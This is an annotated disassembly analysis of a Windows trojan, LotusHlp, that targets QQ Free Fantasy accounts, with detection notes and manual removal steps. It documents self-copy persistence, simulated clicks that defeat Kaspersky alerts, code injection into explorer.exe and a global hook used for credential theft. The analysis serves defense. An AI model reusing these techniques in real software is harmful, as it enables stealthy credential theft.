性质:木马类
大小:103,424 字节
; --- Single-instance check via a named event ---
; The function entry and the instructions that load esi/ebx are above this
; excerpt. From the debugger annotations: esi -> "8397DDFF", ebx = 0 (used as
; FALSE/NULL for every zero argument below). 1F0003 = EVENT_ALL_ACCESS.
00401071 |. 56 push esi ; /EventName => "8397DDFF"
00401072 |. 53 push ebx ; |Inheritable => FALSE
00401073 |. 68 03001F00 push 1F0003 ; |Access = 1F0003
00401078 |. FF15 34204000 call dword ptr ds:[<&KERNEL32.OpenEventA>] ; \OpenEventA
; Non-zero handle => the event already exists, i.e. another instance is
; running: jump to 00401402 (target not in this excerpt; presumably the
; exit path).
0040107E |. 85C0 test eax,eax
00401080 |. 0F85 7C030000 jnz LotusHlp.00401402
; Otherwise create the event (auto-reset, not signaled, default security) so
; that later instances take the jump above.
00401086 |. 56 push esi ; /EventName => "8397DDFF"
00401087 |. 53 push ebx ; |InitiallySignaled => FALSE
00401088 |. 53 push ebx ; |ManualReset => FALSE
00401089 |. 53 push ebx ; |pSecurity => NULL
0040108A |. FF15 30204000 call dword ptr ds:[<&KERNEL32.CreateEventA>; \CreateEventA
; Detection note: a named event "8397DDFF" in a process's handle table is a
; usable host indicator for this sample.
//通过 OpenEventA 打开名为 "8397DDFF" 的事件;若已存在则跳转到 00401402(另一实例已在运行),不存在则用 CreateEventA 创建——常见的防重复运行检测
; --- Build installation paths, spawn a worker thread, copy self ---
; Stack buffers used in this excerpt (roles follow from the lea/push pairs):
;   ebp-21C : scratch long path (GetWindowsDirectoryA / GetModuleFileNameA /
;             GetSystemDirectoryA all write here)
;   ebp-320 : short-name form of the Windows directory, later "<windir>\LotusHlp.exe"
;   ebp-424 : short-name form of this module's own path
;   ebp-118 : short-name form of the system directory, later "<sysdir>\LotusHlp.dll"
; esi = 104h (260, MAX_PATH) for every BufSize argument; ebx = 0.
; The buffer pointer in eax for the first call is loaded above this excerpt;
; GetShortPathNameA below reads the result from ebp-21C, so presumably
; eax == ebp-21C here -- confirm in a debugger.
004010AF |. 56 push esi ; /BufSize => 104 (260.)
004010B0 |. 50 push eax ; |Buffer
; Byte flag at [ebp-1] set to 1; its consumer is not in this excerpt.
004010B1 |. C645 FF 01 mov byte ptr ss:[ebp-1],1 ; |
004010B5 |. FF15 24204000 call dword ptr ds:[<&KERNEL32.GetWindowsDi>; \GetWindowsDirectoryA
; edi caches the GetShortPathNameA import pointer for the three calls below.
004010BB |. 8B3D 20204000 mov edi,dword ptr ds:[<&KERNEL32.GetShortP>; kernel32.GetShortPathNameA
004010C1 |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
004010C7 |. 56 push esi ; /MaxShortPathSize => 104 (260.)
004010C8 |. 50 push eax ; |ShortPath
004010C9 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C] ; |
004010CF |. 50 push eax ; |LongPath
004010D0 |. FFD7 call edi ; \GetShortPathNameA
; Own executable path (hModule = NULL) -> ebp-21C -> short form in ebp-424.
004010D2 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C]
004010D8 |. 56 push esi ; /BufSize => 104 (260.)
004010D9 |. 50 push eax ; |PathBuffer
004010DA |. 53 push ebx ; |hModule => NULL
004010DB |. FF15 1C204000 call dword ptr ds:[<&KERNEL32.GetModuleFil>; \GetModuleFileNameA
004010E1 |. 8D85 DCFBFFFF lea eax,dword ptr ss:[ebp-424]
004010E7 |. 56 push esi ; /MaxShortPathSize => 104 (260.)
004010E8 |. 50 push eax ; |ShortPath
004010E9 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C] ; |
004010EF |. 50 push eax ; |LongPath
004010F0 |. FFD7 call edi ; \GetShortPathNameA
; System directory -> ebp-21C -> short form in ebp-118.
004010F2 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C]
004010F8 |. 56 push esi ; /BufSize => 104 (260.)
004010F9 |. 50 push eax ; |Buffer
004010FA |. FF15 18204000 call dword ptr ds:[<&KERNEL32.GetSystemDir>; \GetSystemDirectoryA
00401100 |. 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
00401106 |. 56 push esi ; /MaxShortPathSize => 104 (260.)
00401107 |. 50 push eax ; |ShortPath
00401108 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C] ; |
0040110E |. 50 push eax ; |LongPath
0040110F |. FFD7 call edi ; \GetShortPathNameA
; ebp-118 := "<sysdir>\LotusHlp.dll"  (two unbounded strcat calls into a
; 260-byte buffer; no length check is visible).
00401111 |. 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
00401117 |. 68 4C334000 push LotusHlp.0040334C ; /src = "\"
0040111C |. 50 push eax ; |dest
0040111D |. E8 4E090000 call <jmp.&MSVCRT.strcat> ; \strcat
00401122 |. 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
00401128 |. 68 20334000 push LotusHlp.00403320 ; /src = "LotusHlp.dll"
0040112D |. 50 push eax ; |dest
0040112E |. E8 3D090000 call <jmp.&MSVCRT.strcat> ; \strcat
; ebp-320 := "<windir>\LotusHlp.exe"
00401133 |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
00401139 |. 68 4C334000 push LotusHlp.0040334C ; /src = "\"
0040113E |. 50 push eax ; |dest
0040113F |. E8 2C090000 call <jmp.&MSVCRT.strcat> ; \strcat
00401144 |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
0040114A |. 68 10304000 push LotusHlp.00403010 ; /src = "LotusHlp.exe"
0040114F |. 50 push eax ; |dest
00401150 |. E8 1B090000 call <jmp.&MSVCRT.strcat> ; \strcat
; Pop the cdecl arguments of the four strcat calls (4 x 2 x 4 = 20h bytes).
00401155 |. 83C4 20 add esp,20
; Worker thread: entry 0040188B (body not in this excerpt), 400h-byte stack,
; no parameter, runs immediately. Handle kept in [ebp-8].
00401158 |. 53 push ebx ; /pThreadId
00401159 |. 53 push ebx ; |CreationFlags
0040115A |. 53 push ebx ; |pThreadParm
0040115B |. 68 8B184000 push LotusHlp.0040188B ; |ThreadFunction = LotusHlp.0040188B
00401160 |. 68 00040000 push 400 ; |StackSize = 400 (1024.)
00401165 |. 53 push ebx ; |pSecurity
00401166 |. FF15 14204000 call dword ptr ds:[<&KERNEL32.CreateThread>; \CreateThread
; Priority 2 = THREAD_PRIORITY_HIGHEST.
0040116C |. 6A 02 push 2 ; /Priority = THREAD_PRIORITY_HIGHEST
0040116E |. 50 push eax ; |hThread
0040116F |. 8945 F8 mov dword ptr ss:[ebp-8],eax ; |
00401172 |. FF15 10204000 call dword ptr ds:[<&KERNEL32.SetThreadPri>; \SetThreadPriority
; Wait at most 1 s for the thread, then drop the handle. Closing the handle
; does not stop the thread; if the wait timed out it is still running.
00401178 |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
0040117D |. FF75 F8 push dword ptr ss:[ebp-8] ; |hObject
00401180 |. FF15 48204000 call dword ptr ds:[<&KERNEL32.WaitForSingl>; \WaitForSingleObject
00401186 |. FF75 F8 push dword ptr ss:[ebp-8] ; /hObject = 00000038
00401189 |. FF15 28204000 call dword ptr ds:[<&KERNEL32.CloseHandle>>; \CloseHandle
; (00401189..004011B3 elided by the author.) First self-copy attempt:
; ExistingFileName = own path (ebp-424); NewFileName = eax, loaded in the
; elided range -- presumably one of the paths built above, verify in a
; debugger. FailIfExists = FALSE, so an existing file is overwritten.
004011B3 |. 53 push ebx ; /FailIfExists
004011B4 |. 50 push eax ; |NewFileName
004011B5 |. 8D85 DCFBFFFF lea eax,dword ptr ss:[ebp-424] ; |
004011BB |. 50 push eax ; |ExistingFileName
004011BC |. FF15 78204000 call dword ptr ds:[<&KERNEL32.CopyFileA>] ; \CopyFileA
; Success -> 00401237 (outside this excerpt). The fall-through is the
; fallback path when the first copy fails.
004011C2 |. 85C0 test eax,eax
004011C4 |. 75 71 jnz short LotusHlp.00401237
; Fallback: call 00401837("LotusHlp.exe", 0Ah) -- body not shown; the two
; `pop ecx` below discard its two cdecl arguments.
004011C6 |. 6A 0A push 0A
004011C8 |. 68 10304000 push LotusHlp.00403010 ; ASCII "LotusHlp.exe"
004011CD |. E8 65060000 call LotusHlp.00401837
004011D2 |. 59 pop ecx
004011D3 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C]
004011D9 |. 59 pop ecx
; 6578652E is the little-endian dword for the bytes 2E 65 78 65 = ".exe",
; written at 00403010+6, i.e. into the middle of the "LotusHlp.exe" string.
; The retry below therefore copies under an altered file name; the exact
; resulting name depends on what 00401837 did to the string -- confirm
; dynamically rather than from this listing.
004011DA |. C705 16304000 2E>mov dword ptr ds:[403016],6578652E
; Rebuild ebp-320 := "<windir>\" + string at 00403010.
004011E4 |. 56 push esi ; /BufSize
004011E5 |. 50 push eax ; |Buffer
004011E6 |. FF15 24204000 call dword ptr ds:[<&KERNEL32.GetWindowsDi>; \GetWindowsDirectoryA
004011EC |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
004011F2 |. 56 push esi
004011F3 |. 50 push eax
004011F4 |. 8D85 E4FDFFFF lea eax,dword ptr ss:[ebp-21C]
004011FA |. 50 push eax
004011FB |. FFD7 call edi
004011FD |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
00401203 |. 68 4C334000 push LotusHlp.0040334C ; /src = "\"
00401208 |. 50 push eax ; |dest
00401209 |. E8 62080000 call <jmp.&MSVCRT.strcat> ; \strcat
0040120E |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
00401214 |. 68 10304000 push LotusHlp.00403010 ; /src = "LotusHlp.exe"
00401219 |. 50 push eax ; |dest
0040121A |. E8 51080000 call <jmp.&MSVCRT.strcat> ; \strcat
; Pop the two strcat calls' arguments (10h bytes).
0040121F |. 83C4 10 add esp,10
; Second self-copy attempt into the Windows directory; the return value
; check, if any, is beyond this excerpt.
00401222 |. 8D85 E0FCFFFF lea eax,dword ptr ss:[ebp-320]
00401228 |. 53 push ebx ; /FailIfExists
00401229 |. 50 push eax ; |NewFileName
0040122A |. 8D85 DCFBFFFF lea eax,dword ptr ss:[ebp-424] ; |
00401230 |. 50 push eax ; |ExistingFileName
00401231 |. FF15 78204000 call dword ptr ds:[<&KERNEL32.CopyFileA>] ; \CopyFileA
; Detection note: the file names LotusHlp.exe (Windows dir) and
; LotusHlp.dll (system dir) and a copy of this module written with
; FailIfExists = FALSE are the persistence artifacts to look for.
//判断系统目录下是否已存在 LotusHlp.dll、LotusHlp.exe 两个文件;若不存在则开启一个线程(入口 0040188B),将自身(GetModuleFileNameA 取得的路径)用 CopyFileA 复制为 LotusHlp.exe,并查找资源释放 LotusHlp.dll(代码略)
; --- Locate an AV alert window and walk its children ---
; eax = class-name pointer loaded above this excerpt; per the debugger
; annotation it is "AVP.AlertDialog" or "AVP.Product_Notification" (the
; author identifies these as Kaspersky alert windows). ebx = 0.
004019BD . 53 push ebx ; /Title
004019BE . 50 push eax ; |Class = "AVP.AlertDialog" "AVP.Product_Notification"
004019BF . FF15 D0204000 call dword ptr ds:[<&USER32.FindWindowA>] ; \FindWindowA
; No such window -> 00401A11 (outside this excerpt).
004019C5 . 3BC3 cmp eax,ebx
004019C7 . 74 48 je short LotusHlp.00401A11
; GetWindow(hWnd, GW_CHILD = 5): first child control. The `>` at 004019CC
; marks a jump target, so this call is re-entered from below -- the
; enumeration loop's back-edge is not in this excerpt.
004019C9 . 6A 05 push 5 ; /Relation = GW_CHILD
004019CB . 50 push eax ; |hWnd
004019CC > FF15 D4204000 call dword ptr ds:[<&USER32.GetWindow>] ; \GetWindow
004019D2 . 8BF8 mov edi,eax
004019D4 . 3BFB cmp edi,ebx
004019D6 . 74 39 je short LotusHlp.00401A11
; Read up to 1Fh (31) characters of the child's text into ebp-60;
; presumably used to pick which control to "click" -- the comparison and
; the simulated click are beyond this excerpt.
004019D8 . 8D45 A0 lea eax,dword ptr ss:[ebp-60]
004019DB . 6A 1F push 1F ; /Count = 1F (31.)
004019DD . 50 push eax ; |Buffer
004019DE . 57 push edi ; |hWnd
004019DF . FF15 D8204000 call dword ptr ds:[<&USER32.GetWindowTextA>; \GetWindowTextA
//用 FindWindowA 查找卡巴斯基的提示窗口(窗口类 "AVP.AlertDialog" / "AVP.Product_Notification"),遍历其子窗口并读取窗口文本,再通过模拟点击的方式绕过卡巴斯基主动防御
; --- Find a process by name via a Toolhelp snapshot ---
; [ebp+8]  = this routine's first argument, the process name to look for
;            (the author says "explorer.exe").
; ebp-128  = PROCESSENTRY32 (dwSize = 128h = 296, the ANSI structure size).
; ebp-104  = (ebp-128) + 24h = PROCESSENTRY32.szExeFile.
; ebx = 0.
004017CB |. 53 push ebx ; /ProcessID => 0
004017CC |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
; rep stos: zero-fill of a buffer at edi (ecx/eax were set above this
; excerpt; most likely the PROCESSENTRY32 itself -- not verifiable here).
004017CE |. F3:AB rep stos dword ptr es:[edi] ; |
004017D0 |. E8 95020000 call <jmp.&KERNEL32.CreateToolhelp32Snapsh>; \CreateToolhelp32Snapshot
004017D5 |. 8BF8 mov edi,eax
004017D7 |. 8D85 D8FEFFFF lea eax,dword ptr ss:[ebp-128]
004017DD |. 50 push eax ; /pProcessentry
004017DE |. 57 push edi ; |hSnapshot
004017DF |. C785 D8FEFFFF 28>mov dword ptr ss:[ebp-128],128 ; |
004017E9 |. E8 76020000 call <jmp.&KERNEL32.Process32First> ; \Process32First
; esi = _stricmp: case-insensitive compare of szExeFile against the wanted
; name. The two arguments are pushed once here; the loop below must re-push
; them on its back-edge, which is outside this excerpt.
004017EE |. 8B35 BC204000 mov esi,dword ptr ds:[<&MSVCRT._stricmp>] ; MSVCRT._stricmp
004017F4 |. 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004017FA |. 50 push eax
004017FB |. FF75 08 push dword ptr ss:[ebp+8]
; Loop: eax == 0 means the names match -> 00401823 (found); otherwise
; advance with Process32Next. The two `pop ecx` discard _stricmp's cdecl
; arguments.
004017FE |> FFD6 /call esi
00401800 |. 59 |pop ecx
00401801 |. 85C0 |test eax,eax
00401803 |. 59 |pop ecx
00401804 |. 74 1D |je short LotusHlp.00401823
00401806 |. 8D85 D8FEFFFF |lea eax,dword ptr ss:[ebp-128]
0040180C |. 50 |push eax ; /pProcessentry
0040180D |. 57 |push edi ; |hSnapshot
0040180E |. E8 4B020000 |call <jmp.&KERNEL32.Process32Next> ; \Process32Next
; Note: Process32Next's return value is not tested in this excerpt; whether
; the loop terminates at end-of-snapshot cannot be seen here.
//用 CreateToolhelp32Snapshot / Process32First / Process32Next 遍历进程,以 _stricmp 比较进程名查找 "explorer.exe"
; --- Open the target process with full access ---
; [ebp+10] = third argument of this routine: the PID found by the
; snapshot loop. 1F0FFF = PROCESS_ALL_ACCESS.
00401486 |. FF75 10 push dword ptr ss:[ebp+10] ; /ProcessId
00401489 |. 6A 00 push 0 ; |Inheritable = FALSE
0040148B |. 68 FF0F1F00 push 1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401490 |. FF15 58204000 call dword ptr ds:[<&KERNEL32.OpenProcess>>; \OpenProcess
; The handle overwrites the PID in its own argument slot; mov does not
; touch flags, so jnz still tests OpenProcess's return value.
00401496 |. 85C0 test eax,eax
00401498 |. 8945 10 mov dword ptr ss:[ebp+10],eax
0040149B |. 75 02 jnz short LotusHlp.0040149F
; NULL handle: tear down the frame and return (eax = 0 to the caller).
0040149D |. C9 leave
0040149E |. C3 retn
; Success: preserve the callee-saved registers, then fetch this process's
; pseudo-handle.
0040149F |> 53 push ebx
004014A0 |. 56 push esi
004014A1 |. 57 push edi
004014A2 |. FF15 54204000 call dword ptr ds:[<&KERNEL32.GetCurrentPr>; [GetCurrentProcess
; Detection note: PROCESS_ALL_ACCESS on explorer.exe followed by the remote
; write / remote thread sequence shown later is the classic injection
; pattern to alert on.
//找到后以 PROCESS_ALL_ACCESS 权限打开该进程(失败则直接 leave/retn 返回),再调用 GetCurrentProcess 获取本进程的伪句柄
……(省略一些不必要的代码)……
; --- Make the remote region writable+executable and write the payload ---
; Arguments of this routine: [ebp+8] = hProcess, [ebp+C] = remote address,
; [ebp+10] = local buffer, [ebp+14] = size. esi = VirtualProtectEx import
; pointer (loaded above this excerpt); eax = &OldProtect (a local).
00401767 |. 50 push eax ; /pOldProtect
00401768 |. 6A 40 push 40 ; |NewProtect = PAGE_EXECUTE_READWRITE
0040176A |. FF75 14 push dword ptr ss:[ebp+14] ; |Size
0040176D |. FF75 0C push dword ptr ss:[ebp+C] ; |Address
00401770 |. FF75 08 push dword ptr ss:[ebp+8] ; |hProcess
00401773 |. FFD6 call esi ; \VirtualProtectEx
; Failure -> 004017A5 (outside this excerpt).
00401775 |. 85C0 test eax,eax
00401777 |. 74 2C je short LotusHlp.004017A5
; push edi is not one of WriteProcessMemory's five arguments below;
; presumably saved for a later call -- its consumer is not shown.
00401779 |. 57 push edi
0040177A |. 6A 00 push 0 ; /pBytesWritten = NULL
0040177C |. FF75 14 push dword ptr ss:[ebp+14] ; |BytesToWrite
0040177F |. FF75 10 push dword ptr ss:[ebp+10] ; |Buffer
00401782 |. FF75 0C push dword ptr ss:[ebp+C] ; |Address
00401785 |. FF75 08 push dword ptr ss:[ebp+8] ; |hProcess
00401788 |. FF15 60204000 call dword ptr ds:[<&KERNEL32.WriteProcess>; \WriteProcessMemory
; --- Separate routine (address drops from 00401788 to 00401643) ---
; CreateRemoteThread(hProcess = [ebp+10], lpThreadAttributes = ebx,
;   dwStackSize = 400h, lpStartAddress = [ebp-18], lpParameter = [ebp-10],
;   dwCreationFlags = ebx, lpThreadId = ebx). ebx is presumably 0 here as in
; the other fragments; its load is not shown.
00401643 |. 53 push ebx
00401644 |. 53 push ebx
00401645 |. FF75 F0 push dword ptr ss:[ebp-10]
00401648 |. FF75 E8 push dword ptr ss:[ebp-18]
0040164B |. 68 00040000 push 400
00401650 |. 53 push ebx
00401651 |. FF75 10 push dword ptr ss:[ebp+10]
00401654 |. FF15 38204000 call dword ptr ds:[<&KERNEL32.CreateRemote>; kernel32.CreateRemoteThread
; Detection note: VirtualProtectEx(PAGE_EXECUTE_READWRITE) +
; WriteProcessMemory + CreateRemoteThread against another process is the
; sequence the author reports as blocked by Micropoint's active defense.
//在目标进程中申请内存并用 VirtualProtectEx 设为 PAGE_EXECUTE_READWRITE,以 WriteProcessMemory 写入木马代码,再用 CreateRemoteThread 创建远程线程激活
//这一步被微点主动防御拦截(kill)了
; --- DLL side (IDA listing): install a message hook, then kill qqffo.exe ---
; (First line lacks the ".text:" dot -- extraction artifact, left as is.)
; Save esi, then esi = 0 (used as the zero argument below).
text:10001C2B push esi
.text:10001C2C xor esi, esi
; SetWindowsHookExA(idHook = 3 = WH_GETMESSAGE, lpfn = sub_10001C10,
;   hMod = hModule, dwThreadId = 0). dwThreadId = 0 is a system-wide hook;
; per the documented API, a global hook causes the hooking DLL to be mapped
; into the other GUI processes on the desktop -- which is how this DLL ends
; up inside explorer.exe and other processes.
.text:10001C2E push esi
.text:10001C2F push hModule
.text:10001C35 push offset sub_10001C10
.text:10001C3A push 3
.text:10001C3C call ds:SetWindowsHookExA
; Hook handle kept in the DLL's data (hhk); sub_100058B6("qqffo.exe") is,
; per the author's note, a process-name lookup (body not shown). It is
; cdecl: `pop ecx` discards its one argument. eax == 0 -> not found.
.text:10001C42 push offset aQqffo_exe ; "qqffo.exe"
.text:10001C47 mov ds:hhk, eax
.text:10001C4C call sub_100058B6
.text:10001C51 cmp eax, esi
.text:10001C53 pop ecx
.text:10001C54 jz short loc_10001C6C
; OpenProcess(dwDesiredAccess = 1 = PROCESS_TERMINATE, bInheritHandle = 0,
;   dwProcessId = eax).
.text:10001C56 push eax
.text:10001C57 push esi
.text:10001C58 push 1
.text:10001C5A call ds:OpenProcess
.text:10001C60 cmp eax, esi
.text:10001C62 jz short loc_10001C6C
; TerminateProcess(hProcess, uExitCode = 0). No CloseHandle appears in this
; excerpt.
.text:10001C64 push esi
.text:10001C65 push eax
.text:10001C66 call ds:TerminateProcess
; Detection note: a global WH_GETMESSAGE hook whose module is an unsigned
; DLL in the system directory, and that DLL terminating a client
; application, are both visible to hook-enumeration and EDR tooling.
//dll 被激活后调用 SetWindowsHookExA(idHook=3,即 WH_GETMESSAGE)安装全局消息钩子,然后遍历进程查找 qqffo.exe(QQ自由幻想),找到则以 PROCESS_TERMINATE 权限 OpenProcess 并用 TerminateProcess 将其结束,待用户再次登录时盗取账号密码信息
此类行为木马的手动清除方案:
下载 wsyscheck、SnipeSword、IceSword 等同类工具,勾选“禁止线程创建”后打开 explorer.exe 进程,直接卸载病毒 dll 即可;随后删除病毒启动项以及主体文件